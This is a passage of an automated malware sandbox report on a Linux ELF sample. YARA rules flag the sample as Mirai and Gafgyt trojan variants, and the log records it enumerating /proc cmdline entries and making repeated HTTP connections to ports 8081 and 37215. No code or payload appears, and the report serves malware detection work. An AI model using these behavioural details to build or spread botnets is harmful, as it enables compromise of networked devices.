                      Source: 1gx339YsKN.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
                      Source: 5540.1.0000000000400000.0000000000421000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
                      Source: 5540.1.0000000000400000.0000000000421000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
                      Source: 5540.1.0000000000400000.0000000000421000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
                      Source: 5540.1.0000000000400000.0000000000421000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
                      Source: 5540.1.0000000000400000.0000000000421000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
                      Source: 5540.1.0000000000400000.0000000000421000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d0c57a2e os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ee7d3a33575ed3aa7431489a8fb18bf30cfd5d6c776066ab2a27f93303124b6, id = d0c57a2e-c10c-436c-be13-50a269326cf2, last_modified = 2021-09-16
                      Source: 5540.1.0000000000400000.0000000000421000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
                      Source: 5540.1.0000000000400000.0000000000421000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_0cd591cd os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 96c4ff70729ddb981adafd8c8277649a88a87e380d2f321dff53f0741675fb1b, id = 0cd591cd-c348-4c3a-a895-2063cf892cda, last_modified = 2021-09-16
                      Source: 5540.1.0000000000400000.0000000000421000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
                      Source: 5540.1.0000000000400000.0000000000421000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_a33a8363 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 74f964eaadbf8f30d40cdec40b603c5141135d2e658e7ce217d0d6c62e18dd08, id = a33a8363-5511-4fe1-a0d8-75156b9ccfc7, last_modified = 2021-09-16
                      Source: 5540.1.0000000000400000.0000000000421000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_1e0c5ce0 reference_sample = 5b1f95840caebf9721bf318126be27085ec08cf7881ec64a884211a934351c2d, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 8e45538b59f9c9b8bc49661069044900c8199e487714c715c1b1f970fd528e3b, id = 1e0c5ce0-3b76-4da4-8bed-2e5036b6ce79, last_modified = 2021-09-16
                      Source: 5540.1.0000000000400000.0000000000421000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_520deeb8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f4dfd1d76e07ff875eedfe0ef4f861bee1e4d8e66d68385f602f29cc35e30cca, id = 520deeb8-cbc0-4225-8d23-adba5e040471, last_modified = 2021-09-16
                      Source: 5540.1.0000000000400000.0000000000421000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_6a77af0f os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 4e436f509e7e732e3d0326bcbdde555bba0653213ddf31b43cfdfbe16abb0016, id = 6a77af0f-31fa-4793-82aa-10b065ba1ec0, last_modified = 2021-09-16
                      Source: 5540.1.0000000000400000.0000000000421000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_01e4a728 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = d90477364982bdc6cd22079c245d866454475749f762620273091f2fab73c196, id = 01e4a728-7c1c-479b-aed0-cb76d64dbb02, last_modified = 2021-09-16
                      Source: 5540.1.0000000000400000.0000000000421000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
                      Source: Process Memory Space: 1gx339YsKN.elf PID: 5540, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
                      Source: classification engineClassification label: mal100.troj.linELF@0/0@6/0
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/1583/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/2672/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/110/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/111/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/112/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/113/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/234/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/1577/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/114/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/235/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/115/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/116/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/117/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/118/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/3630/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/119/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/10/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/917/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/11/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/12/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/13/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/14/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/15/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/16/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/17/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/18/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/19/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/1593/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/240/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/120/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/3094/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/121/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/242/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/3406/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/1/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/122/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/243/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/2/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/123/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/244/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/1589/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/3/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/124/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/245/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/1588/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/125/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/4/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/246/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/3402/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/126/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/5/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/247/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/127/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/6/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/248/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/128/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/7/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/249/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/8/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/129/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/800/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/9/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/801/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/803/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/20/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/806/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/3889/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/21/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/807/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/928/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/22/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/23/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/24/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/25/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/26/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/27/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/5167/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/28/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/29/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/3420/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/490/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/250/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/130/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/251/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/131/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/252/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/132/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/253/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/254/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/255/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/135/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/256/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/1599/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/257/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/378/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/258/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/3412/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/259/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/30/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/35/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/1371/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/260/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/261/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/262/cmdlineJump to behavior
                      Source: /tmp/1gx339YsKN.elf (PID: 5542)File opened: /proc/142/cmdlineJump to behavior

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43786 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 41568 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 58742 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43710 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 48184 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 34928 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57212 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 58108 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59872 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57564 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 56470 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51184 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51662 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 45306 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 40562 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 36894 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 35096 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 40982 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50810 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52914 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 44264 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 39646 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 44966 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 35060 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 56376 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59676 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 56906 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 54084 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 37504 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53894 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 40586 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 46688 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57596 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50876 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 60346 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53904 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 34418 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 38502 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 35228 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 39766 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51488 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50110 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52596 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 34602 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 42090 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50352 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50774 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 34436 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 34480 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43090 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57278 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 42340 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 48590 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43638 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55366 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 47294 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 45738 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57716 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 37594 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 45392 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 54612 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 47806 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 32804 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49252 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51272 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 42050 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 36214 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 35948 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50092 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 40008 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 44230 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 44722 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 40202 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50094 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 46850 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 56116 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 56092 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43494 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50926 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52176 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59386 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 47186 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 42092 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 36520 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49388 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53444 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 36374 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59972 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51442 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 33816 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 39522 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53364 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 41334 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 56802 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 41166 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 33960 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 48746 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 42306 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 35846 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 35376 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 38296 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 47002 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 44544 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 35626 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 60312 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 54158 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 46428 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 36174 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53906 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50818 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55242 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 34140 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 56228 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 60218 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 54158 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 56364 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 45960 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 54782 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 54542 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 38446 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 58160 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51958 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 56980 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55246 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49320 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 37766 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55046 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 39396 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 46556 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57522 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51910 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 56252 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 42676 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49380 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43164 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 48738 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59950 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 41858 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 44846 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43574 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43878 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 56582 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53612 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53782 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 35856 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 46084 -> 37215
